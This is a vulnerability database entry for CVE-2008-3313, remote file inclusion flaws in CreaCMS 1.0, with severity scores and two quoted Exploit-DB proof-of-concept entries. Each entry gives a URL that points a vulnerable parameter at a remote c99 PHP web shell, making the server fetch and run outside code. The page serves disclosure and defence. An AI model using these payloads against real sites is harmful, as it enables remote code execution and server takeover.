CVE-2008-3313
published 2008-07-25CVE-2008-3313: Multiple PHP remote file inclusion vulnerabilities in CreaCMS 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) cfg[document_uri]…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.25%
80.7th percentile
Multiple PHP remote file inclusion vulnerabilities in CreaCMS 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) cfg[document_uri] parameter to _administration/edition_article/edition_article.php and the (2) cfg[base_uri_admin] parameter to _administration/fonctions/get_liste_langue.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| creacms | creacms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion
exploitdb·2008-07-18
CVE-2008-3313 CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion
CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php?
Exploit-DB
CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion
exploitdb·2008-07-18
CVE-2008-3313 CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion
CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php?
No writeups or analysis indexed.
2008-07-25
Published